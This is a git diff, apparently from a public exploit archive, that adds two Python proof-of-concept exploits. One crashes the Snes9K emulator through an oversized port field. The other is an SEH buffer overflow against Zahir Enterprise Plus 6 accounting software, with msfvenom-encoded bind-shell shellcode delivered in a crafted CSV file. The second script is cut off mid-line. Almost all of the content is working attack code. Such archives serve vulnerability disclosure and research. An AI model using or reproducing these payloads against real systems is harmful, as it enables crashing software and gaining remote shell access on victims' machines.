\ No newline at end of file diff --git a/exploits/windows_x86/local/45504.py b/exploits/windows_x86/local/45504.py new file mode 100755 index 000000000..beab18707 --- /dev/null +++ b/exploits/windows_x86/local/45504.py @@ -0,0 +1,20 @@ +# Exploit Title: Snes9K 0.0.9z - Denial of Service (PoC) +# Date: 2018-09-28 +# Exploit Author: crash_manucoot +# Vendor Homepage: https://sourceforge.net/projects/snes9k/ +# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download +# Version: 0.0.9z +# Tested on: Windows 7 Home Premium x86 SPANISH +# Category: Windows Local Exploit +# How to use: open the program go to Netplay-Options-paste the contents of open.txt +# in the Socket Port Number and Boom + +buffer = "A" * 260 +nseh = "B" * 4 +seh = "C" * 4 +junk = "D" * 300 + +evil = buffer + nseh + seh + junk + +file = open('open.txt','w+') +file.write(evil) \ No newline at end of file diff --git a/exploits/windows_x86/local/45505.py b/exploits/windows_x86/local/45505.py new file mode 100755 index 000000000..7f888fcb5 --- /dev/null +++ b/exploits/windows_x86/local/45505.py @@ -0,0 +1,86 @@ +# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) +# Google Dork: - +# Date: 2018-09-28 +# Exploit Author: modpr0be +# Vendor Homepage: http://www.zahiraccounting.com/ +# Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip +# Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip +# Tested on: Windows 7 x86/64bit +# CVE : N/A +# Category: local & privilege escalation +# +# Description +# Vulnerability occurs when the Zahir cannot handle large inputs and anomalies crafted CSV file. +# The Zahir main program failed to process the CR LF (Carriage Return Line Feed) characters which +# caused the Zahir main program to crash. +# +# Credits to f3ci, who found the vulnerability. +# +# Proof of Concept +#!/usr/bin/python + +import struct + +# msfvenom -p windows/shell_bind_tcp -a x86 -b '\x00\x0a\x0d\x22\x2c' \ +# -n 20 -e x86/shikata_ga_nai -f python -v sc +# we won't worry about the space, it's big enough! +# badchars are 00,0a,0d,22,2c +sc = "" +sc += "\x92\x91\xf5\x99\x98\xf5\xd6\x48\x48\x3f\x2f\x99\x4a" +sc += "\x42\x9f\x2f\x42\x43\x43\x42\xb8\x8c\xa3\xb1\xa0\xdd" +sc += "\xc0\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x53\x31\x43\x12" +sc += "\x83\xc3\x04\x03\xcf\xad\x53\x55\x33\x59\x11\x96\xcb" +sc += "\x9a\x76\x1e\x2e\xab\xb6\x44\x3b\x9c\x06\x0e\x69\x11" +sc += "\xec\x42\x99\xa2\x80\x4a\xae\x03\x2e\xad\x81\x94\x03" +sc += "\x8d\x80\x16\x5e\xc2\x62\x26\x91\x17\x63\x6f\xcc\xda" +sc += "\x31\x38\x9a\x49\xa5\x4d\xd6\x51\x4e\x1d\xf6\xd1\xb3" +sc += "\xd6\xf9\xf0\x62\x6c\xa0\xd2\x85\xa1\xd8\x5a\x9d\xa6" +sc += "\xe5\x15\x16\x1c\x91\xa7\xfe\x6c\x5a\x0b\x3f\x41\xa9" +sc += "\x55\x78\x66\x52\x20\x70\x94\xef\x33\x47\xe6\x2b\xb1" +sc += "\x53\x40\xbf\x61\xbf\x70\x6c\xf7\x34\x7e\xd9\x73\x12" +sc += "\x63\xdc\x50\x29\x9f\x55\x57\xfd\x29\x2d\x7c\xd9\x72" +sc += "\xf5\x1d\x78\xdf\x58\x21\x9a\x80\x05\x87\xd1\x2d\x51" +sc += "\xba\xb8\x39\x96\xf7\x42\xba\xb0\x80\x31\x88\x1f\x3b" +sc += "\xdd\xa0\xe8\xe5\x1a\xc6\xc2\x52\xb4\x39\xed\xa2\x9d" +sc += "\xfd\xb9\xf2\xb5\xd4\xc1\x98\x45\xd8\x17\x34\x4d\x7f" +sc += "\xc8\x2b\xb0\x3f\xb8\xeb\x1a\xa8\xd2\xe3\x45\xc8\xdc" +sc += "\x29\xee\x61\x21\xd2\x01\x2e\xac\x34\x4b\xde\xf8\xef" +sc += "\xe3\x1c\xdf\x27\x94\x5f\x35\x10\x32\x17\x5f\xa7\x3d" +sc += "\xa8\x75\x8f\xa9\x23\x9a\x0b\xc8\x33\xb7\x3b\x9d\xa4" +sc += "\x4d\xaa\xec\x55\x51\xe7\x86\xf6\xc0\x6c\x56\x70\xf9" +sc += "\x3a\x01\xd5\xcf\x32\xc7\xcb\x76\xed\xf5\x11\xee\xd6" +sc += "\xbd\xcd\xd3\xd9\x3c\x83\x68\xfe\x2e\x5d\x70\xba\x1a" +sc += "\x31\x27\x14\xf4\xf7\x91\xd6\xae\xa1\x4e\xb1\x26\x37" +sc += "\xbd\x02\x30\x38\xe8\xf4\xdc\x89\x45\x41\xe3\x26\x02" +sc += "\x45\x9c\x5a\xb2\xaa\x77\xdf\xc2\xe0\xd5\x76\x4b\xad" +sc += "\x8c\xca\x16\x4e\x7b\x08\x2f\xcd\x89\xf1\xd4\xcd\xf8" +sc += "\xf4\x91\x49\x11\x85\x8a\x3f\x15\x3a\xaa\x15" + +junk = "A" * 3041 +junk += '\n\r' +junk += 'A' * 380 +junk += "\xeb\x08\x90\x90" # nseh +junk += struct.pack('